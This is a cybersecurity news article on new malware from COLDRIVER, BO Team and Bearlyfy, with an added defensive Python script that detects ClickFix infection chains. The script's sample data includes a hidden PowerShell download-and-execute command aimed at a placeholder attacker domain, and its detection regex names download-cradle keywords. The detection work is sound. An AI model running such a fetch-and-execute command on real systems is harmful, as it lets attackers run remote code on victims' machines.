
Russian APTs Launch New Malware Attacks; Bearlyfy Targets Firms

Russian-Linked COLDRIVER and Other Groups Deploy New Malware and Ransomware in Targeted Cyberattacks

  • The Russian group COLDRIVER used new malware, BAITSWITCH and SIMPLEFIX, in recent attacks.
  • Attack methods include tricking users into running malicious files disguised as CAPTCHA prompts.
  • Victims include government, nonprofit, and civil society organizations with links to Russia.
  • Other groups, including BO Team and Bearlyfy, launched attacks against Russian companies with updated tools and ransomware.
  • Ransom demands in recent attacks ranged from several thousand dollars to $86,000.

A recent cyberattack campaign by the Russian-linked group COLDRIVER, also known as Callisto, Star Blizzard, and UNC4057, targeted a range of organizations with new malware tools. The campaign, identified by Zscaler ThreatLabz in early June, uses a multi-stage method to deploy BAITSWITCH and SIMPLEFIX, described as a lightweight downloader and a backdoor, respectively.


Researchers reported that BAITSWITCH serves as the first stage, delivering SIMPLEFIX, a PowerShell-based backdoor. According to Zscaler, “The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced.” The attackers lure users with fake CAPTCHA prompts that instruct them to run a malicious file. This file connects to an attacker-controlled internet domain to download the SIMPLEFIX malware. The malware sends device information to the attackers, establishes remote access, and hides its tracks by clearing evidence from system logs.

Further analysis showed that SIMPLEFIX communicates with remote servers to run programs and collect files from targeted devices. The current campaign follows the pattern of the group’s previous operations, which typically aim at non-governmental organizations, activists, and others connected to Russian civil society.
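The chain described above (a user-launched PowerShell process fetching a payload from a remote domain, then clearing the event log) leaves a pattern in endpoint telemetry that a defender can hunt for. The following Python detection logic is an added example, not code from the article or from Zscaler; it runs over a few constructed Sysmon-style process-creation and Security 1102 (audit log cleared) records, and the hostnames, timestamps and domain are invented.

```python
import re
from datetime import datetime

# Constructed sample telemetry (not from the article). Each record mimics a Sysmon
# process-creation event (eid 1) or a Windows Security "audit log cleared" event (eid 1102).
SAMPLE_EVENTS = [
    {"ts": "2025-06-03T09:14:02", "host": "WS-17", "eid": 1, "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr http://attacker.invalid/s | iex"'},
    {"ts": "2025-06-03T09:14:40", "host": "WS-17", "eid": 1102, "parent": "", "image": "", "cmd": ""},
    {"ts": "2025-06-03T11:02:11", "host": "WS-22", "eid": 1, "parent": "explorer.exe",
     "image": "powershell.exe", "cmd": "powershell -File C:\\tools\\inventory.ps1"},
    {"ts": "2025-06-03T11:40:00", "host": "WS-22", "eid": 1102, "parent": "", "image": "", "cmd": ""},
]

# Interpreters a ClickFix lure typically asks the user to paste into, and the
# download-and-execute markers that separate a remote fetch from a routine admin
# script. This is a heuristic; tune the lists to your environment.
USER_FACING_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
CRADLE_RE = re.compile(
    r"(?:^|\s)-enc|\b(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b"
)

def is_clickfix_launch(ev):
    """True when a user-driven shell (parent explorer.exe) runs a download cradle."""
    if ev["eid"] != 1 or ev["image"].lower() not in USER_FACING_INTERPRETERS:
        return False
    if ev["parent"].lower() != "explorer.exe":
        return False
    return CRADLE_RE.search(ev["cmd"].lower()) is not None

def find_clickfix_chains(events, window_minutes=15):
    """Correlate each cradle launch with a log clear on the same host soon after.
    A launch alone is medium severity; launch plus event 1102 in the window is high."""
    clears = [e for e in events if e["eid"] == 1102]
    alerts = []
    for launch in (e for e in events if is_clickfix_launch(e)):
        t0 = datetime.fromisoformat(launch["ts"])
        cleared = any(
            c["host"] == launch["host"]
            and 0 <= (datetime.fromisoformat(c["ts"]) - t0).total_seconds() <= window_minutes * 60
            for c in clears
        )
        alerts.append({"host": launch["host"], "launch_ts": launch["ts"],
                       "log_cleared": cleared, "severity": "high" if cleared else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_clickfix_chains(SAMPLE_EVENTS):
        print(alert)
```

On the constructed data only WS-17 is flagged, at high severity, because its log clear follows the cradle launch within the window; the WS-22 administrative script never matches the cradle pattern.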

In other developments, cybersecurity firm Kaspersky identified a phishing attack against Russian companies by the group BO Team, which used password-protected archive files to distribute updated versions of BrockenDoor and a Golang-based backdoor called ZeronetKit. The ZeronetKit malware gives attackers the ability to remotely control infected systems, transfer files, and run commands. Kaspersky noted that the malware relies on BrockenDoor to maintain persistence on infected systems.

A separate group named Bearlyfy used ransomware (specifically LockBit 3.0 and Babuk) in a series of attacks on Russian firms, as reported by F6. Ransom amounts varied, with the highest reported demand near $86,000 in cryptocurrency. Bearlyfy reportedly gained initial access by exploiting vulnerabilities in software such as Bitrix and then leveraged known privilege escalation flaws to obtain higher levels of access on victims’ systems.


The investigation also revealed that Bearlyfy’s attack style differs from that of known groups. F6 explained, “Bearlyfy…uses a different model: attacks with minimal preparation and a targeted focus on achieving an immediate effect. The primary toolkit is aimed at encryption, destruction, or modification of data.” Although some of the infrastructure used overlaps with that of the suspected pro-Ukrainian group PhantomCore, researchers believe Bearlyfy acts independently.

These attacks highlight ongoing cybersecurity risks faced by various organizations both within and connected to Russia.
